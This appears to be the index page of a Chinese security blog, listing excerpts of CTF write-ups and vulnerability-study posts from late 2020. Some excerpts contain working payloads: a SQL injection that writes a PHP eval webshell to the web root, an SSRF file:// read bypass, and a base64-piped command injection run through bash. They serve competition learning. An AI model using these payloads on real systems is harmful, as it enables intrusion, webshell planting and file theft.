纵横杯

2020-12-28 10:12:00 364
ctf - wp - 纵横杯

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写绕过 password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+ hello_php www.zip源码...

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写...

阅读全文>>

bypass disable function学习

2020-12-25 23:12:00 399
漏洞学习 - bypass disable function

文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行代码 or 发现了一个phpinfo页面之后,会从该页面中搜集一些可用信息以便后续漏洞的寻找。 我谈谈我个人的几个偏向点: 版本号 最直观的就是php版本号(虽然版本号有时候会在响应头中出现),如我的机器上版本号为: PHP Version 7.2.9-1 那么找到版本号后就会综...

文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行...

阅读全文>>

roarctf 2020

2020-12-07 21:12:00 124
ctf - wp - roar

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过 Payload: http://47.104.232.98:49725/?url=file:///fla%25%36%37 Hi_433MHz 导入au,短的是0,长的是1: 得到: 011001100 011011000 011000010 011001110 011110...

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过...

阅读全文>>

蚁剑自写编码器

2020-12-03 20:12:00 112
备忘 - 蚁剑 - 编码器

ps:水文一篇,权当个人备忘 编码器常见于特殊webshell,如我们往webshell中压多一句base64用以绕过某些waf,那么蚁剑中自带了一些编码器,但在需要如多层base64时内置的编码器往往就不够用了。 base64 一个最简单的base64编码器编写如下: ```js /* * php::base64编码器 * Create at: 2020/11/21 15:21:10 ...

ps:水文一篇,权当个人备忘 编码器常见于特殊webshell,如我们往webshell中压多一句base64用以...

阅读全文>>

首届“祥云杯”网络安全大赛

2020-11-24 15:11:00 159
ctf - wp - 祥云杯

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: 稍微加点空格什么的修修改改就行了,payload: ?url=|echo%09"Y2FcdCAvZXRjLy5maW5kZmxhZy8q"|base64%09-d|ba\s\h flaskbot 通过各种让他报错拿到一份大概的源码: 可以看到这里用了render_templ...

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: ...

阅读全文>>

Redis常见漏洞学习

2020-11-15 13:11:00 115
漏洞学习 - redis

文章首发于:i春秋 简述 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务器可以是关联其他从服务器的主服务器。这使得Redis可执行单层树复制。存盘可以...

文章首发于:i春秋 简述 Redis(Remote Dictionary Server ),即远程字典服务,是一...

阅读全文>>

appsec_il ctf2020

2020-11-06 20:11:00 174
ctf - appsec_il

最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your resume on word is for rookies. Real programmers use yaml. ~~I hope I don't have any bugs~~ URL: https://resume-yml.appsecil.ctf.today/ By Meit...

最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your re...

阅读全文>>

西湖论剑2020

2020-10-13 17:10:00 413
ctf - 西湖论剑

题目质量很高,嗯,太菜了只能复现 EasyJson 源码: ```php <?php include 'security.php'; if(!isset($_GET['source'])){ show_source(FILE); die(); } $sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'...

题目质量很高,嗯,太菜了只能复现 EasyJson 源码: ```php <?php include 'se...

阅读全文>>

ciscn 2020 final web

2020-10-10 12:10:00 218
ctf - wp - ciscn

文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到这么两句sql语句: <!-- $query = "SELECT * FROM fake_flag WHERE id = $id limit 0,$limit"; //$query = "SELECT flag FROM real_flag WHERE id = $id ...

文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到...

阅读全文>>

Java-Web之s2-001与CommonsCollections

2020-09-18 20:09:00 199
代码审计 - 反序列化 - java

文章首发于:合天 本文源自我个人入坑Java-Web安全的一点小经验,献给那些看得懂java代码但不知道从哪里入手代审的师傅们:) Struts2之s2-001 环境配置 说说环境配置的问题,大多数人对漏洞复现的恐惧感还是来自于环境的配置,也许配了大半天的环境后只花几分钟就把漏洞复现了,感觉有点得不偿失,环境配置过程又是因各人电脑问题有着五花八门的问题,因此有时候会找不到问题出在哪。 虽说有...

文章首发于:合天 本文源自我个人入坑Java-Web安全的一点小经验,献给那些看得懂java代码但不知道从哪里入手...

阅读全文>>


CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号